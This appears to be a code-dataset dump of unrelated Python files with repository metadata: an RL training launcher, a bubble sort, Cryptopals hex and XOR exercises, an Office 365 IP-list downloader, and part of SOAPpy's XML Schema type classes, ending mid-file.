parser.add_argument("--stats_path", required=True, type=str)
parser.add_argument("--env", required=True, type=str)
parser.add_argument("--seed", required=True, type=int)
parser.add_argument("--learn_contact", action='store_true')
args = parser.parse_args()
random.seed(args.seed)
torch.manual_seed(args.seed)
torch.cuda.manual_seed_all(args.seed)
np.random.seed(args.seed)
torch.set_num_threads(args.seed)
import gym
env = gym.make(args.env)
env.seed(args.seed)
ppo = RL(env, [256, 256], learn_contact=args.learn_contact)
print(args.learn_contact)
ppo.seed = args.seed
ppo.model_name = args.policy_path
ppo.stats_name = args.stats_path
ppo.save_model(ppo.model_name)
ppo.collect_samples_multithread()
| 31.518519
| 61
| 0.782609
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 73
| 0.085781
|
af39df71abbbbebb35d3f9fbf9be1554dbe20b3c
| 797
|
py
|
Python
|
Sorting/bubble_sort.py
|
fredricksimi/leetcode
|
f6352c26914ca77f915f5994746ecf0b36efc89b
|
[
"MIT"
] | null | null | null |
Sorting/bubble_sort.py
|
fredricksimi/leetcode
|
f6352c26914ca77f915f5994746ecf0b36efc89b
|
[
"MIT"
] | null | null | null |
Sorting/bubble_sort.py
|
fredricksimi/leetcode
|
f6352c26914ca77f915f5994746ecf0b36efc89b
|
[
"MIT"
] | 1
|
2021-12-05T12:27:46.000Z
|
2021-12-05T12:27:46.000Z
|
"""
Bubble Sort:
"""
# Best: O(n) time | O(1) space
# Average: O(n^2) time | O(1) space
# Worst: O(n^2) time | O(1) space
def bubbleSort(array):
did_swap = False
while True:
did_swap = False
for idx in range(1, len(array)):
if array[idx] < array[idx-1]:
# swap
array[idx], array[idx-1] = array[idx-1], array[idx]
did_swap = True
if not did_swap:
return array
"""
Traverse the input array, swapping any two numbers that are out of order and keeping track of any swaps that you make.
Once you arrive at the end of the array, check if you have made any swaps;
if not, the array is sorted and you are done; otherwise, repeat the steps laid out in this hint until the array is sorted.
"""
| 26.566667
| 122
| 0.604768
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 449
| 0.563363
|
af3d1abf4c4665c9462b07e2b917b4a51a0fdfc4
| 1,715
|
py
|
Python
|
ccs1.py
|
derrickaw/operation_crypto
|
6bf006a0a9246f6a9c5ae64b1bb395cc9d951c72
|
[
"MIT"
] | null | null | null |
ccs1.py
|
derrickaw/operation_crypto
|
6bf006a0a9246f6a9c5ae64b1bb395cc9d951c72
|
[
"MIT"
] | null | null | null |
ccs1.py
|
derrickaw/operation_crypto
|
6bf006a0a9246f6a9c5ae64b1bb395cc9d951c72
|
[
"MIT"
] | null | null | null |
# Crypto Challenge Set 1
"""
1. Convert hex to base64
2. Fixed buffer XOR
3.
"""
import base64
def convert_hex_to_base64(hex):
"""
Converts hex string to base64 encoding
:param hex: hex encoded string
:return: base64 encoded string
"""
# Convert hex to byte string
decoded_hex = bytearray.fromhex(hex)
# Convert byte string to base64 encoded string; then convert to string
encoded_base64_str = bytes.decode(base64.b64encode(decoded_hex))
return encoded_base64_str
def xor_fixed_buffers(buf1, buf2):
"""
Creates XOR buffered string from two hex string buffers
:param buf1: hex encoded string
:param buf2: hex encoded string
:return: xor hex encoded string
"""
# Convert hex to bytearray
decoded_hex_buf1 = bytearray.fromhex(buf1)
decoded_hex_buf2 = bytearray.fromhex(buf2)
# XOR by byte
xor_buf = bytearray(len(decoded_hex_buf1))
for i in range(len(xor_buf)):
xor_buf[i] = decoded_hex_buf1[i] ^ decoded_hex_buf2[i]
# Convert back to hex string
xor_buf = bytes(xor_buf).hex()
return xor_buf
if __name__ == '__main__':
# 1. Convert hex to base64
assert convert_hex_to_base64('49276d206b696c6c696e6720796f757'
'220627261696e206c696b6520612070'
'6f69736f6e6f7573206d757368726f6'
'f6d') \
== 'SSdtIGtpbGxpbmcgeW91ciBicmFpbiBsaWtlIGEgcG9pc29ub3VzIG11c2hyb29t'
# 2. Fixed XOR
assert xor_fixed_buffers('1c0111001f010100061a024b53535009181c',
'686974207468652062756c6c277320657965') \
== '746865206b696420646f6e277420706c6179'
| 23.175676
| 77
| 0.661224
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 882
| 0.514286
|
af3fd4c2face07438cfa2add7939e20eaaa6ebd0
| 7,748
|
py
|
Python
|
o365_ip.py
|
satchm0h/o365_ip
|
1845fc6e5a2414f23bbce82784f4e7f0cac6528b
|
[
"MIT"
] | 1
|
2020-11-01T11:03:01.000Z
|
2020-11-01T11:03:01.000Z
|
o365_ip.py
|
satchm0h/o365_ip
|
1845fc6e5a2414f23bbce82784f4e7f0cac6528b
|
[
"MIT"
] | null | null | null |
o365_ip.py
|
satchm0h/o365_ip
|
1845fc6e5a2414f23bbce82784f4e7f0cac6528b
|
[
"MIT"
] | null | null | null |
#!/bin/env python3
import os
import sys
import json
import uuid
import argparse
import logging
import coloredlogs
import requests
# Defining the default values that can be overridden on the CLI
DEFAULTS = {
'guidfile': 'client-guid',
'outfile': 'last-dump',
'verfile': 'last-version',
'instance': 'Worldwide'
}
def main(options):
# Lets make do stuff. See init at the bottom for the 'options' logic
logging.info('Starting')
if options.force:
if options.deltafile:
if os.path.isfile(options.deltafile):
os.remove(options.deltafile)
if os.path.isfile(options.verfile):
os.remove(options.verfile)
if os.path.isfile(options.outfile):
os.remove(options.outfile)
# If we are doing a delta, wipe any previous delta file
if options.deltafile is not None:
write_json_file(options.deltafile, {})
# If there is no update we are done, unless forced
(new_version, previous_version) = get_versions(options.version_url,
options.verfile)
if new_version == previous_version:
logging.info('Version matches previous. No update')
sys.exit(0)
# Download and process the latest IPs
ip_struct = get_ip_addresses(options.data_url, options.optional)
# Calcualte delta if we are asked to do so
if options.deltafile is not None:
generate_delta(ip_struct, options.outfile, options.deltafile)
logging.info(f'Delta File: {options.deltafile}')
# Dump the latest results to disk
write_json_file(options.outfile, ip_struct, True)
commit_processed_version(options.verfile, new_version)
logging.info(f'Output File: {options.outfile}')
logging.info('Complete!')
def write_json_file(filename, data, pretty=False):
# Dump a python data structure to JSON FILE
logging.debug(f'Writing JSON File : {filename}')
with open(filename, 'w') as file_handle:
if pretty:
json.dump(data, file_handle, indent=2)
else:
json.dump(data, file_handle)
def get_versions(url, filename):
# Here we want to determinge if there is a new version to process or not
previous_version = "42"
logging.debug('Downloading Version Information')
current_version = get_version_info(url)
# If we've run before, read in the version last processed
if os.path.isfile(filename):
previous_version = read_single_state(filename)
if current_version == previous_version:
logging.debug(f'No version change: {current_version}')
else:
logging.debug(f'New version discovered: {current_version}')
return (current_version, previous_version)
def commit_processed_version(filename, version):
# Write out the version we have finished processing
logging.debug(f'Writing last processed version to: {filename}')
write_single_state(filename, version)
def get_version_info(url):
version_info = requests.get(url).json()
if 'latest' in version_info:
return version_info['latest']
return None
def read_single_state(filename):
logging.debug(f'Read state file: {filename}')
with open(filename, 'r') as file_handle:
return file_handle.readline().rstrip()
def write_single_state(filename, value):
logging.debug(f'Write state file: {filename}')
with open(filename, 'w') as file_handle:
print(value, file=file_handle)
def generate_delta(data, filename, deltafile):
logging.debug('Generating Delta')
delta = {'add': [], 'remove': []}
previous = {}
# If there is a previous run, lets load it.
if os.path.isfile(filename):
with open(filename, 'r') as file_handle:
previous = json.load(file_handle)
# Find new additions
for ip in data:
if ip not in previous:
delta['add'].append(ip)
# Find removals
for ip in previous:
if ip not in data:
delta['remove'].append(ip)
# Write out the Delta
write_json_file(deltafile, delta, True)
def init_deltafile(filename):
logging.debug(f'Initializing Delta File : {filename}')
if os.path.isfile(filename):
with open(filename, 'w') as file_handle:
# Empty object in-case there are no changes
print('{}', file=file_handle)
def get_ip_addresses(url, include_optional):
logging.debug(f'Include optional IPs: {include_optional}')
# We are going to accumualte IPs in dicts to de-dup
ips = {}
records = requests.get(url).json()
for record in records:
if 'ips' in record:
for ip in record['ips']:
if record['required']:
ips[ip] = 42
elif include_optional:
ips[ip] = 42
return ips
def init():
'''
init()
Handle command line args, setup log, etc..
'''
global DEFAULTS
# Configure log
coloredlogs.install(level='DEBUG',
fmt='%(asctime)s %(levelname)s %(message)s')
# Supress requests log
logging.getLogger('requests').setLevel(logging.WARNING)
logging.getLogger('urllib3').setLevel(logging.WARNING)
# Handle command line args
parser = argparse.ArgumentParser(
description='Get Microsoft Office 365 IP lists.')
parser.add_argument('-D, --debug', dest='debug',
help='Full download output',
action='store_true')
parser.add_argument('-f, --force', dest='force',
help='Download update even if version has not changed',
action='store_true')
parser.add_argument('-o, --outfile', dest='outfile',
help='Full download output',
default=DEFAULTS['outfile'])
parser.add_argument('-v, --verfile', dest='verfile',
help='File to store version infomation',
default=DEFAULTS['verfile'])
parser.add_argument('-d, --deltafile', dest='deltafile',
help='Generate delta to file',
default=None)
parser.add_argument('-g, --guidfile', dest='guidfile',
help='File to load guid from. Will generate if file not found',
default=DEFAULTS['guidfile'])
parser.add_argument('-i, --instance', dest='instance',
help='Microsoft Office 365 Instance',
choices=['Worldwide', 'China', 'Germany',
'USGovDoD', 'USGovGCCHigh'],
default=DEFAULTS['instance'])
parser.add_argument('-p, --disable_optional_ips', dest='optional',
help="Do not include optional IPs",
action='store_false')
options = parser.parse_args()
# Enable debug
if not options.debug:
coloredlogs.decrease_verbosity()
# Read client guid from file or generate and write to file for
# subsequent runs. Not Microsoft asks for a unique UUID per "system" that
# accesses the API
if os.path.isfile(options.guidfile):
options.client_guid = read_single_state(options.guidfile)
else:
options.client_guid = uuid.uuid4()
write_single_state(options.guidfile, options.client_guid)
# Build the URLs based on the Instance selection and our guid
base_url = 'https://endpoints.office.com'
options.version_url = f'{base_url}/version/{options.instance}/?clientrequestid={options.client_guid}'
options.data_url = f'{base_url}/endpoints/{options.instance}/?clientrequestid={options.client_guid}'
return options
if __name__ == '__main__':
main(init())
| 33.834061
| 105
| 0.63126
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,706
| 0.349251
|
af406546a6f0ed26414148fc4236cb5e5b9c721d
| 53,251
|
py
|
Python
|
src/SOAPpy/Types.py
|
ramoncreager/SOAPpy
|
8f157e9612e0e140980a909b0e3e4a316c7a4e92
|
[
"BSD-3-Clause"
] | null | null | null |
src/SOAPpy/Types.py
|
ramoncreager/SOAPpy
|
8f157e9612e0e140980a909b0e3e4a316c7a4e92
|
[
"BSD-3-Clause"
] | null | null | null |
src/SOAPpy/Types.py
|
ramoncreager/SOAPpy
|
8f157e9612e0e140980a909b0e3e4a316c7a4e92
|
[
"BSD-3-Clause"
] | null | null | null |
"""
###############################################################################
# Copyright (c) 2003, Pfizer
# Copyright (c) 2001, Cayce Ullman.
# Copyright (c) 2001, Brian Matthews.
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# Neither the name of actzero, inc. nor the names of its contributors may
# be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
###############################################################################
"""
from __future__ import nested_scopes
import UserList
import base64
import cgi
import urllib
import copy
import re
import time
from types import DictType, ListType, TupleType, StringType, UnicodeType, \
NoneType, IntType, LongType, FloatType
# SOAPpy modules
from Errors import Error
from NS import NS
from Utilities import encodeHexString, cleanDate
from Config import Config
ident = '$Id: Types.py 1496 2010-03-04 23:46:17Z pooryorick $'
NaN = float('NaN')
PosInf = float('Inf')
NegInf = -PosInf
###############################################################################
# Utility functions
###############################################################################
def isPrivate(name):
return name[0] == '_'
def isPublic(name):
return name[0] != '_'
###############################################################################
# Types and Wrappers
###############################################################################
class anyType:
_validURIs = (NS.XSD, NS.XSD2, NS.XSD3, NS.ENC)
def __init__(self, data=None, name=None, typed=1, attrs=None):
if self.__class__ == anyType:
raise Error("anyType can't be instantiated directly")
if type(name) in (ListType, TupleType):
self._ns, self._name = name
else:
self._ns = self._validURIs[0]
self._name = name
self._typed = typed
self._attrs = {}
self._cache = None
self._type = self._typeName()
self._data = self._checkValueSpace(data)
if attrs is not None:
self._setAttrs(attrs)
def __str__(self):
if hasattr(self, '_name') and self._name:
return "<%s %s at %d>" % (self.__class__, self._name, id(self))
return "<%s at %d>" % (self.__class__, id(self))
__repr__ = __str__
def _checkValueSpace(self, data):
return data
def _marshalData(self):
return str(self._data)
def _marshalAttrs(self, ns_map, builder):
a = ''
for attr, value in self._attrs.items():
ns, n = builder.genns(ns_map, attr[0])
a += n + ' %s%s="%s"' % \
(ns, attr[1], cgi.escape(str(value), 1))
return a
def _fixAttr(self, attr):
if type(attr) in (StringType, UnicodeType):
attr = (None, attr)
elif type(attr) == ListType:
attr = tuple(attr)
elif type(attr) != TupleType:
raise AttributeError("invalid attribute type")
if len(attr) != 2:
raise AttributeError("invalid attribute length")
if type(attr[0]) not in (NoneType, StringType,
UnicodeType):
raise AttributeError("invalid attribute namespace URI type")
return attr
def _getAttr(self, attr):
attr = self._fixAttr(attr)
try:
return self._attrs[attr]
except Exception:
return None
def _setAttr(self, attr, value):
attr = self._fixAttr(attr)
if isinstance(value, StringType):
value = unicode(value)
self._attrs[attr] = value
def _setAttrs(self, attrs):
if type(attrs) in (ListType, TupleType):
for i in range(0, len(attrs), 2):
self._setAttr(attrs[i], attrs[i + 1])
return
if isinstance(attrs, DictType):
d = attrs
elif isinstance(attrs, anyType):
d = attrs._attrs
else:
raise AttributeError("invalid attribute type")
for attr, value in d.items():
self._setAttr(attr, value)
def _setMustUnderstand(self, val):
self._setAttr((NS.ENV, "mustUnderstand"), val)
def _getMustUnderstand(self):
return self._getAttr((NS.ENV, "mustUnderstand"))
def _setActor(self, val):
self._setAttr((NS.ENV, "actor"), val)
def _getActor(self):
return self._getAttr((NS.ENV, "actor"))
def _typeName(self):
return self.__class__.__name__[:-4]
def _validNamespaceURI(self, URI, strict):
if not hasattr(self, '_typed') or not self._typed:
return None
if URI in self._validURIs:
return URI
if not strict:
return self._ns
raise AttributeError("not a valid namespace for type %s" % self._type)
class voidType(anyType):
pass
class stringType(anyType):
def _checkValueSpace(self, data):
if data is None:
raise ValueError("must supply initial %s value" % self._type)
if type(data) not in (StringType, UnicodeType):
raise AttributeError("invalid %s type:" % self._type)
return data
def _marshalData(self):
return self._data
class untypedType(stringType):
def __init__(self, data=None, name=None, attrs=None):
stringType.__init__(self, data, name, 0, attrs)
class IDType(stringType):
pass
class NCNameType(stringType):
pass
class NameType(stringType):
pass
class ENTITYType(stringType):
pass
class IDREFType(stringType):
pass
class languageType(stringType):
pass
class NMTOKENType(stringType):
pass
class QNameType(stringType):
pass
class tokenType(anyType):
_validURIs = (NS.XSD2, NS.XSD3)
__invalidre = '[\n\t]|^ | $| '
def _checkValueSpace(self, data):
if data is None:
raise ValueError("must supply initial %s value" % self._type)
if type(data) not in (StringType, UnicodeType):
raise AttributeError("invalid %s type" % self._type)
if isinstance(self.__invalidre, StringType):
self.__invalidre = re.compile(self.__invalidre)
if self.__invalidre.search(data):
raise ValueError("invalid %s value" % self._type)
return data
class normalizedStringType(anyType):
_validURIs = (NS.XSD3,)
__invalidre = '[\n\r\t]'
def _checkValueSpace(self, data):
if data is None:
raise ValueError("must supply initial %s value" % self._type)
if type(data) not in (StringType, UnicodeType):
raise AttributeError("invalid %s type" % self._type)
if isinstance(self.__invalidre, StringType):
self.__invalidre = re.compile(self.__invalidre)
if self.__invalidre.search(data):
raise ValueError("invalid %s value" % self._type)
return data
class CDATAType(normalizedStringType):
_validURIs = (NS.XSD2,)
class booleanType(anyType):
def __int__(self):
return self._data
__nonzero__ = __int__
def _marshalData(self):
return ['false', 'true'][self._data]
def _checkValueSpace(self, data):
if data is None:
raise ValueError("must supply initial %s value" % self._type)
if data in (0, '0', 'false', ''):
return 0
if data in (1, '1', 'true'):
return 1
raise ValueError("invalid %s value" % self._type)
class decimalType(anyType):
def _checkValueSpace(self, data):
if data is None:
raise ValueError("must supply initial %s value" % self._type)
if type(data) not in (IntType, LongType, FloatType):
raise Error("invalid %s value" % self._type)
return data
class floatType(anyType):
def _checkValueSpace(self, data):
if data is None:
raise ValueError("must supply initial %s value" % self._type)
if type(data) not in (IntType, LongType, FloatType) \
or data < -3.4028234663852886E+38 \
or data > 3.4028234663852886E+38:
raise ValueError("invalid %s value: %s" % (self._type, repr(data)))
return data
def _marshalData(self):
return "%.18g" % self._data # More precision
class doubleType(anyType):
def _checkValueSpace(self, data):
if data is None:
raise ValueError("must supply initial %s value" % self._type)
if type(data) not in (IntType, LongType, FloatType) \
or data < -1.7976931348623158E+308 \
or data > 1.7976931348623157E+308:
raise ValueError("invalid %s value: %s" % (self._type, repr(data)))
return data
def _marshalData(self):
return "%.18g" % self._data # More precision
class durationType(anyType):
_validURIs = (NS.XSD3,)
def _checkValueSpace(self, data):
if data is None:
raise ValueError("must supply initial %s value" % self._type)
try:
# A tuple or a scalar is OK, but make them into a list
if type(data) == TupleType:
data = list(data)
elif type(data) != ListType:
data = [data]
if len(data) > 6:
raise Exception("too many values")
# Now check the types of all the components, and find
# the first nonzero element along the way.
f = -1
for i in range(len(data)):
if data[i] is None:
data[i] = 0
continue
if type(data[i]) not in (IntType, LongType,
FloatType):
raise Exception("element %d a bad type" % i)
if data[i] and f == -1:
f = i
# If they're all 0, just use zero seconds.
if f == -1:
self._cache = 'PT0S'
return (0,) * 6
# Make sure only the last nonzero element has a decimal fraction
# and only the first element is negative.
d = -1
for i in range(f, len(data)):
if data[i]:
if d != -1:
raise Exception(
"all except the last nonzero element must be "
"integers")
if data[i] < 0 and i > f:
raise Exception(
"only the first nonzero element can be negative")
elif data[i] != long(data[i]):
d = i
# Pad the list on the left if necessary.
if len(data) < 6:
n = 6 - len(data)
f += n
d += n
data = [0] * n + data
# Save index of the first nonzero element and the decimal
# element for _marshalData.
self.__firstnonzero = f
self.__decimal = d
except Exception, e:
raise ValueError("invalid %s value - %s" % (self._type, e))
return tuple(data)
def _marshalData(self):
if self._cache is None:
d = self._data
t = 0
if d[self.__firstnonzero] < 0:
s = '-P'
else:
s = 'P'
t = 0
for i in range(self.__firstnonzero, len(d)):
if d[i]:
if i > 2 and not t:
s += 'T'
t = 1
if self.__decimal == i:
s += "%g" % abs(d[i])
else:
s += "%d" % long(abs(d[i]))
s += ['Y', 'M', 'D', 'H', 'M', 'S'][i]
self._cache = s
return self._cache
class timeDurationType(durationType):
_validURIs = (NS.XSD, NS.XSD2, NS.ENC)
class dateTimeType(anyType):
_validURIs = (NS.XSD3,)
def _checkValueSpace(self, data):
try:
if data is None:
data = time.time()
if type(data) in (IntType, LongType):
data = list(time.gmtime(data)[:6])
elif isinstance(data, FloatType):
f = data - int(data)
data = list(time.gmtime(int(data))[:6])
data[5] += f
elif type(data) in (ListType, TupleType):
if len(data) < 6:
raise Exception("not enough values")
if len(data) > 9:
raise Exception("too many values")
data = list(data[:6])
cleanDate(data)
else:
raise Exception("invalid type")
except Exception, e:
raise ValueError("invalid %s value - %s" % (self._type, e))
return tuple(data)
def _marshalData(self):
if self._cache is None:
d = self._data
s = "%04d-%02d-%02dT%02d:%02d:%02d" % ((abs(d[0]),) + d[1:])
if d[0] < 0:
s = '-' + s
f = d[5] - int(d[5])
if f != 0:
s += ("%g" % f)[1:]
s += 'Z'
self._cache = s
return self._cache
class recurringInstantType(anyType):
_validURIs = (NS.XSD,)
def _checkValueSpace(self, data):
try:
if data is None:
data = list(time.gmtime(time.time())[:6])
if (type(data) in (IntType, LongType)):
data = list(time.gmtime(data)[:6])
elif isinstance(data, FloatType):
f = data - int(data)
data = list(time.gmtime(int(data))[:6])
data[5] += f
elif type(data) in (ListType, TupleType):
if len(data) < 1:
raise Exception("not enough values")
if len(data) > 9:
raise Exception("too many values")
data = list(data[:6])
if len(data) < 6:
data += [0] * (6 - len(data))
f = len(data)
for i in range(f):
if data[i] is None:
if f < i:
raise Exception(
"only leftmost elements can be none")
else:
f = i
break
cleanDate(data, f)
else:
raise Exception("invalid type")
except Exception, e:
raise ValueError("invalid %s value - %s" % (self._type, e))
return tuple(data)
def _marshalData(self):
if self._cache is None:
d = self._data
e = list(d)
neg = ''
if not e[0]:
e[0] = '--'
else:
if e[0] < 0:
neg = '-'
e[0] = abs(e[0])
if e[0] < 100:
e[0] = '-' + "%02d" % e[0]
else:
e[0] = "%04d" % e[0]
for i in range(1, len(e)):
if e[i] is None or (i < 3 and e[i] == 0):
e[i] = '-'
else:
if e[i] < 0:
neg = '-'
e[i] = abs(e[i])
e[i] = "%02d" % e[i]
if d[5]:
f = abs(d[5] - int(d[5]))
if f:
e[5] += ("%g" % f)[1:]
s = "%s%s-%s-%sT%s:%s:%sZ" % ((neg,) + tuple(e))
self._cache = s
return self._cache
class timeInstantType(dateTimeType):
_validURIs = (NS.XSD, NS.XSD2, NS.ENC)
class timePeriodType(dateTimeType):
_validURIs = (NS.XSD2, NS.ENC)
class timeType(anyType):
def _checkValueSpace(self, data):
try:
if data is None:
data = time.gmtime(time.time())[3:6]
elif (type(data) == FloatType):
f = data - int(data)
data = list(time.gmtime(int(data))[3:6])
data[2] += f
elif type(data) in (IntType, LongType):
data = time.gmtime(data)[3:6]
elif type(data) in (ListType, TupleType):
if len(data) == 9:
data = data[3:6]
elif len(data) > 3:
raise Exception("too many values")
data = [None, None, None] + list(data)
if len(data) < 6:
data += [0] * (6 - len(data))
cleanDate(data, 3)
data = data[3:]
else:
raise Exception("invalid type")
except Exception, e:
raise ValueError("invalid %s value - %s" % (self._type, e))
return tuple(data)
def _marshalData(self):
if self._cache is None:
d = self._data
# s = ''
#
# s = time.strftime("%H:%M:%S", (0, 0, 0) + d + (0, 0, -1))
s = "%02d:%02d:%02d" % d
f = d[2] - int(d[2])
if f != 0:
s += ("%g" % f)[1:]
s += 'Z'
self._cache = s
return self._cache
class dateType(anyType):
def _checkValueSpace(self, data):
try:
if data is None:
data = time.gmtime(time.time())[0:3]
elif type(data) in (IntType, LongType,
FloatType):
data = time.gmtime(data)[0:3]
elif type(data) in (ListType, TupleType):
if len(data) == 9:
data = data[0:3]
elif len(data) > 3:
raise Exception("too many values")
data = list(data)
if len(data) < 3:
data += [1, 1, 1][len(data):]
data += [0, 0, 0]
cleanDate(data)
data = data[:3]
else:
raise Exception("invalid type")
except Exception, e:
raise ValueError("invalid %s value - %s" % (self._type, e))
return tuple(data)
def _marshalData(self):
if self._cache is None:
d = self._data
s = "%04d-%02d-%02dZ" % ((abs(d[0]),) + d[1:])
if d[0] < 0:
s = '-' + s
self._cache = s
return self._cache
class gYearMonthType(anyType):
_validURIs = (NS.XSD3,)
def _checkValueSpace(self, data):
try:
if data is None:
data = time.gmtime(time.time())[0:2]
elif type(data) in (IntType, LongType,
FloatType):
data = time.gmtime(data)[0:2]
elif type(data) in (ListType, TupleType):
if len(data) == 9:
data = data[0:2]
elif len(data) > 2:
raise Exception("too many values")
data = list(data)
if len(data) < 2:
data += [1, 1][len(data):]
data += [1, 0, 0, 0]
cleanDate(data)
data = data[:2]
else:
raise Exception("invalid type")
except Exception, e:
raise ValueError("invalid %s value - %s" % (self._type, e))
return tuple(data)
def _marshalData(self):
if self._cache is None:
d = self._data
s = "%04d-%02dZ" % ((abs(d[0]),) + d[1:])
if d[0] < 0:
s = '-' + s
self._cache = s
return self._cache
class gYearType(anyType):
_validURIs = (NS.XSD3,)
def _checkValueSpace(self, data):
try:
if data is None:
data = time.gmtime(time.time())[0:1]
elif type(data) in (IntType, LongType,
FloatType):
data = [data]
if type(data) in (ListType, TupleType):
if len(data) == 9:
data = data[0:1]
elif len(data) < 1:
raise Exception("too few values")
elif len(data) > 1:
raise Exception("too many values")
if isinstance(data[0], FloatType):
try:
s = int(data[0])
except Exception:
s = long(data[0])
if s != data[0]:
raise Exception("not integral")
data = [s]
elif type(data[0]) not in (IntType, LongType):
raise Exception("bad type")
else:
raise Exception("invalid type")
except Exception, e:
raise ValueError("invalid %s value - %s" % (self._type, e))
return data[0]
def _marshalData(self):
if self._cache is None:
d = self._data
s = "%04dZ" % abs(d)
if d < 0:
s = '-' + s
self._cache = s
return self._cache
class centuryType(anyType):
_validURIs = (NS.XSD2, NS.ENC)
def _checkValueSpace(self, data):
try:
if data is None:
data = time.gmtime(time.time())[0:1] / 100
elif type(data) in (IntType, LongType, FloatType):
data = [data]
if type(data) in (ListType, TupleType):
if len(data) == 9:
data = data[0:1] / 100
elif len(data) < 1:
raise Exception("too few values")
elif len(data) > 1:
raise Exception("too many values")
if isinstance(data[0], FloatType):
try:
s = int(data[0])
except Exception:
s = long(data[0])
if s != data[0]:
raise Exception("not integral")
data = [s]
elif type(data[0]) not in (IntType, LongType):
raise Exception("bad type")
else:
raise Exception("invalid type")
except Exception, e:
raise ValueError("invalid %s value - %s" % (self._type, e))
return data[0]
def _marshalData(self):
if self._cache is None:
d = self._data
s = "%02dZ" % abs(d)
if d < 0:
s = '-' + s
self._cache = s
return self._cache
class yearType(gYearType):
_validURIs = (NS.XSD2, NS.ENC)
class gMonthDayType(anyType):
_validURIs = (NS.XSD3,)
def _checkValueSpace(self, data):
try:
if data is None:
data = time.gmtime(time.time())[1:3]
elif type(data) in (IntType, LongType,
FloatType):
data = time.gmtime(data)[1:3]
elif type(data) in (ListType, TupleType):
if len(data) == 9:
data = data[0:2]
elif len(data) > 2:
raise Exception("too many values")
data = list(data)
if len(data) < 2:
data += [1, 1][len(data):]
data = [0] + data + [0, 0, 0]
cleanDate(data, 1)
data = data[1:3]
else:
raise Exception("invalid type")
except Exception, e:
raise ValueError("invalid %s value - %s" % (self._type, e))
return tuple(data)
def _marshalData(self):
if self._cache is None:
self._cache = "--%02d-%02dZ" % self._data
return self._cache
class recurringDateType(gMonthDayType):
_validURIs = (NS.XSD2, NS.ENC)
class gMonthType(anyType):
_validURIs = (NS.XSD3,)
def _checkValueSpace(self, data):
try:
if data is None:
data = time.gmtime(time.time())[1:2]
elif type(data) in (IntType, LongType,
FloatType):
data = [data]
if type(data) in (ListType, TupleType):
if len(data) == 9:
data = data[1:2]
elif len(data) < 1:
raise Exception("too few values")
elif len(data) > 1:
raise Exception("too many values")
if isinstance(data[0], FloatType):
try:
s = int(data[0])
except Exception:
s = long(data[0])
if s != data[0]:
raise Exception("not integral")
data = [s]
elif type(data[0]) not in (IntType, LongType):
raise Exception("bad type")
if data[0] < 1 or data[0] > 12:
raise Exception("bad value")
else:
raise Exception("invalid type")
except Exception, e:
raise ValueError("invalid %s value - %s" % (self._type, e))
return data[0]
def _marshalData(self):
if self._cache is None:
self._cache = "--%02d--Z" % self._data
return self._cache
class monthType(gMonthType):
_validURIs = (NS.XSD2, NS.ENC)
class gDayType(anyType):
_validURIs = (NS.XSD3,)
def _checkValueSpace(self, data):
try:
if data is None:
data = time.gmtime(time.time())[2:3]
elif type(data) in (IntType, LongType,
FloatType):
data = [data]
if type(data) in (ListType, TupleType):
if len(data) == 9:
data = data[2:3]
elif len(data) < 1:
raise Exception("too few values")
elif len(data) > 1:
raise Exception("too many values")
if isinstance(data[0], FloatType):
try:
s = int(data[0])
except Exception:
s = long(data[0])
if s != data[0]:
raise Exception("not integral")
data = [s]
elif type(data[0]) not in (IntType, LongType):
raise Exception("bad type")
if data[0] < 1 or data[0] > 31:
raise Exception("bad value")
else:
raise Exception("invalid type")
except Exception, e:
raise ValueError("invalid %s value - %s" % (self._type, e))
return data[0]
def _marshalData(self):
if self._cache is None:
self._cache = "---%02dZ" % self._data
return self._cache
class recurringDayType(gDayType):
_validURIs = (NS.XSD2, NS.ENC)
class hexBinaryType(anyType):
_validURIs = (NS.XSD3,)
def _checkValueSpace(self, data):
if data is None:
raise ValueError("must supply initial %s value" % self._type)
if type(data) not in (StringType, UnicodeType):
raise AttributeError("invalid %s type" % self._type)
return data
def _marshalData(self):
if self._cache is None:
self._cache = encodeHexString(self._data)
return self._cache
class base64BinaryType(anyType):
_validURIs = (NS.XSD3,)
def _checkValueSpace(self, data):
if data is None:
raise ValueError("must supply initial %s value" % self._type)
if type(data) not in (StringType, UnicodeType):
raise AttributeError("invalid %s type" % self._type)
return data
def _marshalData(self):
if self._cache is None:
self._cache = base64.encodestring(self._data)
return self._cache
class base64Type(base64BinaryType):
_validURIs = (NS.ENC,)
class binaryType(anyType):
_validURIs = (NS.XSD, NS.ENC)
def __init__(self, data, name=None, typed=1,
encoding='base64', attrs=None):
anyType.__init__(self, data, name, typed, attrs)
self._setAttr('encoding', encoding)
def _marshalData(self):
if self._cache is None:
if self._getAttr((None, 'encoding')) == 'base64':
self._cache = base64.encodestring(self._data)
else:
self._cache = encodeHexString(self._data)
return self._cache
def _checkValueSpace(self, data):
if data is None:
raise ValueError("must supply initial %s value" % self._type)
if type(data) not in (StringType, UnicodeType):
